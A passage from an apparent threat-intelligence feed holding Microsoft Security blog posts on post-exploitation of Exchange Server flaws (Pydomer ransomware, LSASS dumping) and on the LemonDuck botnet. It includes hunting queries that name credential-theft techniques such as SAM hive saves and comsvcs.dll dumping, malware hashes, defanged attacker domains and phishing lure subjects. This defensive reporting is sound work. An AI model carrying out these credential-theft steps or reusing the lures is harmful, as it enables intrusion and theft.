ransomware.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig14-Pydomer-PowerShell-downloader-spreader-1024x317.png)\n\n_Figure 14. __PowerShell downloader and spreader used to get the Pydomer payload_\n\nThe script fetches a payload from a site hosted on a domain generation algorithm (DGA) domain, and attempts to spread the payload throughout the network, first attempting to spread the payload over WMI using Invoke-WMIMethod to attempt to connect to systems, and falling back to PowerShell remoting with Enter-PSSession if that fails. The script is run within the context of the web shell, which in most instances is Local System, so this lateral movement strategy is unlikely to work except in organizations that are running highly insecure and unrecommended configurations like having computer objects in highly privileged groups.\n\nThe Pydomer ransomware is a Python script compiled to an executable and uses the Python cryptography libraries to encrypt files. The ransomware encrypts the files and appends a random extension, and then drops a ransom note named _decrypt_file.TxT_.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig15-pydomer-ransom-note.png)\n\n_Figure 15. Pydomer __ransom note_\n\nInterestingly, the attackers seem to have deployed a non-encryption extortion strategy. Following well-known ransomware groups like Maze and Egregor which leaked data for pay, the Pydomer hackers dropped an alternative _readme.txt_ onto systems without encrypting files. This option might have been semi-automated on their part or a side effect of a failure in their encryption process, as some of the systems they accessed were test systems that showed no data exfiltration. The note should be taken seriously if encountered, as the attackers had full access to systems and were likely able to exfiltrate data.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig16-pydomer-extortion-readme.png)\n\n_Figure 16. Pydomer extortion readme.txt_\n\n## Credential theft, turf wars, and dogged persistence\n\nIf a server is not running in a least-privilege configuration, credential theft could provide a significant return on investment for an attacker beyond their initial access to email and data. Many organizations have backup agent software and scheduled tasks running on these systems with domain admin-level permissions. For these organizations, the attackers might be able to harvest highly privileged credentials without lateral movement, for example, using the COM services DLL as a living-off-the-land binary to perform a dump of the LSASS process:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/03/fig17-com-services-dll-lsass-dump.png)\n\n_Figure 17.__ Use of COM services DLL to dump LSASS process_\n\nThe number of observed credential theft attacks, combined with high privilege of accounts often given to Exchange servers, means that these attacks could continue to impact organizations that don\u2019t fully remediate after a compromise even after patches have been applied. While the observed ransomware attempts were small-scale or had errors, there is still the possibility of [more skillful groups](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) utilizing credentials gained in these attacks for later attacks.\n\nAttackers also used their access to perform extensive reconnaissance using built-in Exchange commandlets and _dsquery_ to exfiltrate information about network configurations, user information, and email assets.\n\nWhile Lemon Duck operators might have had the boldest method for removing other attackers from the systems they compromised, they were not the only attacker to do so. Others were observed cleaning up .aspx and .bat files to remove other attackers, and even rebuilding the WMI database by deleting .mof files and restarting the service. As the window on unpatched machines closes, attackers showed increased interest in maintaining the access to the systems they exploited. By utilizing "malwareless" persistence mechanisms like enabling RDP, installing Shadow IT tools, and adding new local administrator accounts, the attackers are hoping to evade incident response efforts that might focus exclusively on web shells, AV scans, and patching.\n\n## Defending against exploits and post-compromise activities\n\nAttackers exploit the on-premises Exchange Server vulnerabilities in combination to bypass authentication and gain the ability to write files and run malicious code. The best and most complete remediation for these vulnerabilities is to update to a supported Cumulative Update and to install all security updates. Comprehensive mitigation guidance can be found here: <https://aka.ms/ExchangeVulns>.\n\nAs seen in the post-exploitation attacks discussed in this blog, the paths that attackers can take after successfully exploiting the vulnerabilities are varied and wide-ranging. If you have determined or have reason to suspect that these threats are present on your network, here are immediate steps you can take:\n\n * Investigate exposed Exchange servers for compromise, regardless of their current patch status.\n * Look for web shells via our [guidance](<https://aka.ms/exchange-customer-guidance>) and run a full AV scan using the [Exchange On-Premises Mitigation Tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n * Investigate Local Users and Groups, even non-administrative users for changes, and ensure all users require a password for sign-in. New user account creations (represented by Event ID 4720) during the time the system was vulnerable might indicate a malicious user creation.\n * Reset and randomize local administrator passwords with a tool like [LAPS](<https://aka.ms/laps>) if you are not already doing so.\n * Look for changes to the RDP, firewall, WMI subscriptions, and Windows Remote Management (WinRM) configuration of the system that might have been configured by the attacker to allow persistence.\n * Look for Event ID 1102 to determine if attackers cleared event logs, an activity that attackers perform with _exe_ in an attempt to hide their tracks.\n * Look for new persistence mechanisms such as unexpected services, scheduled tasks, and startup items.\n * Look for Shadow IT tools that attackers might have installed for persistence, such as non-Microsoft RDP and remote access clients.\n * Check mailbox-level email forwarding settings (both _ForwardingAddress_ and _ForwardingSMTPAddress_ attributes), check mailbox inbox rules (which might be used to forward email externally), and check Exchange Transport rules that you might not recognize.\n\nWhile our response tools check for and remove known web shells and attack tools, performing a full investigation of these systems is recommended. For comprehensive investigation and mitigation guidance and tools, see <https://aka.ms/exchange-customer-guidance>.\n\nAdditionally, here are best practices for building credential hygiene and practicing the principle of least privilege:\n\n * Follow guidance to run Exchange in least-privilege configuration: <https://adsecurity.org/?p=4119>.\n * Ensure service accounts and scheduled tasks run with the least privileges they need. Avoid widely privileged groups like domain admins and backup operators and prefer accounts with access to just the systems they need.\n * Randomize local administrator passwords to prevent lateral movement with tools like [LAPS](<https://aka.ms/laps>).\n * Ensure administrators practice good administration habits like[ Privileged Admin Workstations](<https://docs.microsoft.com/en-us/security/compass/overview>).\n * Prevent privileged accounts like domain admins from signing into member servers and workstations using Group Policy to limit credential exposure and lateral movement.\n\n \n\n## Appendix\n\n### Microsoft Defender for Endpoint detection details\n\n**Antivirus **\n\nMicrosoft Defender Antivirus detects exploitation behavior with these detections:\n\n * Behavior:Win32/Exmann\n * [Behavior:Win32/IISExchgSpawnEMS](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgSpawnEMS.A&threatId=-2147212928>)\n * [Exploit:ASP/CVE-2021-27065](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:ASP/CVE-2021-27065>)\n * Exploit:Script/Exmann\n * Trojan:Win32/IISExchgSpawnCMD\n * [Behavior:Win32/IISExchgDropWebshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.B&threatId=-2147190469>)\n\nWeb shells are detected as:\n\n * [Backdoor:JS/Webshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/WebShell&threatId=-2147233581>)\n * [Backdoor:PHP/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:PHP/Chopper.B!dha&threatId=-2147231664>)\n * Backdoor:ASP/Chopper\n * Backdoor:MSIL/Chopper\n * [Trojan:JS/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:JS/Chopper!dha&threatId=-2147232033>)\n * Trojan:Win32/Chopper\n * [Behavior:Win32/WebShellTerminal](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/WebShellTerminal.A&threatId=-2147213299>)\n\nRansomware payloads and associated files are detected as:\n\n * [Trojan:BAT/Wenam](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:BAT/Wenam.A&threatId=-2147188992>) - _xx.bat_ behaviors\n * [Ransom:Win32/DoejoCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/DoejoCrypt.A&threatId=-2147189904>) - DoejoCrypt ransomware\n * [Trojan:PowerShell/Redearps](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/Redearps.A&threatId=-2147189091>) - PowerShell spreader in Pydomer attacks\n * [Ransom:Win64/Pydomer](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win64/Pydomer.A&threatId=-2147189083>) - Pydomer ransomware\n\nLemon Duck malware is detected as:\n\n * [Trojan:PowerShell/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/LemonDuck.A&threatId=-2147189579>)\n * [Trojan:Win32/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/LemonDuck.A&threatId=-2147189576>)\n\nSome of the credential theft techniques highlighted in this report are detected as:\n\n * [Behavior:Win32/DumpLsass](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/DumpLsass.A!attk&threatId=-2147237471>)\n * Behavior:Win32/RegistryExfil\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Suspicious w3wp.exe activity in Exchange\n * Possible exploitation of Exchange Server vulnerabilities\n * Possible IIS web shell\n * Possible web shell installation\n * Web shells associated with Exchange Server vulnerabilities\n * Network traffic associated with Exchange Server exploitation\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the DoejoCrypt and Pydomer ransomware campaign:\n\n * DoejoCrypt ransomware\n * Pydomer ransomware\n * Pydomer download site\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the Lemon Duck botnet:\n\n * LemonDuck Malware\n * LemonDuck botnet C2 domain activity\n\nThe following behavioral alerts might also indicate threat activity associated with this threat:\n\n * Possible web shell installation\n * A suspicious web script was created\n * Suspicious processes indicative of a web shell\n * Suspicious file attribute change\n * Suspicious PowerShell command line\n * Possible IIS Web Shell\n * Process memory dump\n * A malicious PowerShell Cmdlet was invoked on the machine\n * WDigest configuration change\n * Sensitive information lookup\n * Suspicious registry export\n\n### Advanced hunting\n\nTo locate possible exploitation activities in Microsoft Defender for Endpoint, run the following queries.\n\n**Processes run by the IIS worker process**\n\nLook for processes executed by the IIS worker process\n\n`// Broadly search for processes executed by the IIS worker process. Further investigation should be performed on any devices where the created process is indicative of reconnaissance \nDeviceProcessEvents \n| where InitiatingProcessFileName == 'w3wp.exe' \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| where FileName !in~ (\"csc.exe\",\"cvtres.exe\",\"conhost.exe\",\"OleConverter.exe\",\"wermgr.exe\",\"WerFault.exe\",\"TranscodingService.exe\") \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nSearch for PowerShell spawned from the IIS worker process, observed most frequently in Lemon Duck with Base64 encoding to obfuscate C2 domains\n\n`DeviceProcessEvents \n| where FileName =~ \"powershell.exe\" \n| where InitiatingProcessFileName =~ \"w3wp.exe\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Tampering**\n\nSearch for Lemon Duck tampering with Microsoft Defender Antivirus\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Batch script actions **\n\nSearch for batch scripts performing credential theft, as observed in DoejoCrypt infections\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"C:\\Windows\\Temp\" \n| where ProcessCommandLine has \"reg save\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nLook for evidence of batch script execution that leads to credential dumping\n\n`// Search for batch script execution, leading to credential dumping using rundll32 and the COM Services DLL, dsquery, and makecab use \nDeviceProcessEvents \n| where InitiatingProcessFileName =~ \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"\\inetpub\\wwwroot\\aspnet_client\\\" \n| where InitiatingProcessParentFileName has \"w3wp\" \n| where FileName != \"conhost.exe\" \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Suspicious files dropped under an aspnet_client folder**\n\nLook for dropped suspicious files like web shells and other components\n\n`// Search for suspicious files, including but not limited to batch scripts and web shells, dropped under the file path C:\\inetpub\\wwwroot\\aspnet_client\\ \nDeviceFileEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" \n| where FolderPath has \"\\\\aspnet_client\\\\\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project FileName, FolderPath, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Checking for persistence on systems that have been suspected as compromised**\n\nSearch for creations of new local accounts\n\n`DeviceProcessEvents \n| where FileName == \"net.exe\" \n| where ProcessCommandLine has_all (\"user\", \"add\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Search for installation events that were used to download ScreenConnect for persistence **\n\nNote that this query may be noisy and is not necessarily indicative of malicious activity alone.\n\n`DeviceProcessEvents \n| where FileName =~ \"msiexec.exe\" \n| where ProcessCommandLine has @\"C:\\Windows\\Temp\\\" \n| parse-where kind=regex flags=i ProcessCommandLine with @\"C:\\\\Windows\\\\Temp\\\\\" filename:string @\".msi\" \n| project filename, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Hunting for credential theft **\n\nSearch for logon events related to services and scheduled tasks on devices that may be Exchange servers. The results of this query should be used to verify whether any of these users have privileged roles that might have enabled further persistence.\n\n`let devices = \nDeviceProcessEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" and InitiatingProcessCommandLine contains \"MSExchange\" \n| distinct DeviceId; \n// \nDeviceLogonEvents \n| where DeviceId in (devices) \n| where LogonType in (\"Batch\", \"Service\") \n| project AccountName, AccountDomain, LogonType, DeviceId, Timestamp`\n\nSearch for WDigest registry key modification, which allows for the LSASS process to store plaintext passwords.\n\n`DeviceRegistryEvents \n| where RegistryValueName == \"UseLogonCredential\" \n| where RegistryKey has \"WDigest\" and RegistryValueData == \"1\" \n| project PreviousRegistryValueData, RegistryValueData, RegistryKey, RegistryValueName, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for the COM services DLL being executed by rundll32, which can be used to dump LSASS memory.\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"rundll32.exe\", \"comsvcs.dll\") \n| project FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for Security Account Manager (SAM) or SECURITY databases being saved, from which credentials can later be extracted.\n\n`DeviceProcessEvents \n| where FileName == \"reg.exe\" \n| where ProcessCommandLine has \"save\" and ProcessCommandLine has_any (\"hklm\\\\security\", \"hklm\\\\sam\") \n| project InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\n## Indicators\n\nSelected indicators from attacks are included here, the threats may utilize files and network indicators not represented here.\n\n**Files (SHA-256)**\n\nThe following are file hashes for some of the web shells observed during attacks:\n\n * 201e4e9910dcdc8c4ffad84b60b328978db8848d265c0b9ba8473cf65dcd0c41\n * 2f0bc81c2ea269643cae307239124d1b6479847867b1adfe9ae712a1d5ef135e\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 8e90ed33c7ee82c0b64078ea36ec95f7420ba435c693b3b3dd728b494abf7dfc\n * a291305f181e24fe7194154b4cd355ccb039d5765709c80999e392efec69c90a\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * dd29e8d47dde124c7d14e614e03ccaab3ecaa50e0a0bef985ed59e98928bc13d\n\nDoejoCrypt associated hashes:\n\n * 027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27\n * 10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da\n * 2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff\n * 904fbea2cd68383f32c5bc630d2227601dc52f94790fe7a6a7b6d44bfd904ff3\n * bf53b637683f9cbf92b0dd6c97742787adfbc12497811d458177fdeeae9ec748\n * e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6\n * fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65\n * feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede\n\nLemon Duck associated hashes:\n\n * 0993cc228a74381773a3bb0aa36a736f5c41075fa3201bdef4215a8704e582fc\n * 3df23c003d62c35bd6da90df12826c1d3fdd94029bf52449ba3d89920110d5ec\n * 4f0b9c0482595eee6d9ece0705867b2aae9e4ff68210f32b7425caca763723b9\n * 56101ab0881a6a34513a949afb5a204cad06fd1034f37d6791f3ab31486ba56c\n * 69ce57932c3be3374e8843602df1c93e1af622fc53f3f1d9b0a75b66230a1e2e\n * 737752588f32e4c1d8d20231d7ec553a1bd4a0a090b06b2a1835efa08f9707c4\n * 893ddf0de722f345b675fd1ade93ee1de6f1cad034004f9165a696a4a4758c3e\n * 9cf63310788e97f6e08598309cbbf19960162123e344df017b066ca8fcbed719\n * 9f2fe33b1c7230ec583d7f6ad3135abcc41b5330fa5b468b1c998380d20916cd\n * a70931ebb1ce4f4e7d331141ad9eba8f16f98da1b079021eeba875aff4aeaa85\n * d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09\n * db093418921aae00187ae5dc6ed141c83614e6a4ec33b7bd5262b7be0e9df2cd\n * dc612f5c0b115b5a13bdb9e86f89c5bfe232e5eb76a07c3c0a6d949f80af89fd\n * f517526fc57eb33edb832920b1678d52ad1c5cf9c707859551fe065727587501\n * f8d388f502403f63a95c9879c806e6799efff609001701eed409a8d33e55da2f\n * fbeefca700f84373509fd729579ad7ea0dabdfe25848f44b2fbf61bf7f909df0\n\nPydomer associated hashes:\n\n * 7e07b6addf2f0d26eb17f4a1be1cba11ca8779b0677cedc30dbebef77ccba382\n * 866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\n * 910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\n * a387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287\n * b9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f\n * c25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a\n * c4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908\n\n**Network indicators**\n\nDomains abused by Lemon Duck:\n\n * down[.]sqlnetcat[.]com\n * t[.]sqlnetcat[.]com\n * t[.]netcatkit[.]com\n\nPydomer DGA network indicators:\n\n * uiiuui[.]com/search/*\n * yuuuuu43[.]com/vpn-service/*\n * yuuuuu44[.]com/vpn-service/*\n * yuuuuu46[.]com/search/*\n\nThe post [Analyzing attacks taking advantage of the Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-25T21:21:07", "type": "mssecure", "title": "Analyzing attacks taking advantage of the Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-25T21:21:07", "id": "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "href": "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-30T00:08:30", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n![World map showing geographic distribution of LemonDuck activity](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/lemon-duck-geographic-distribution.png)\n\n_Figure 1. Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemondDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.\n\n![Diagram showing attacker activity following infection of LemonDuck malware, highlight activities common to the LemonDuck and LemonCat infrastructure, and showing unique behavior for each](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/attack-chain.png)\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one if its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n![Screenshot of email related to LemonDuck attack](https://www.microsoft.com/security/blog/uploads/securityprod/2021/07/lemon-duck-email-sample.png)\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 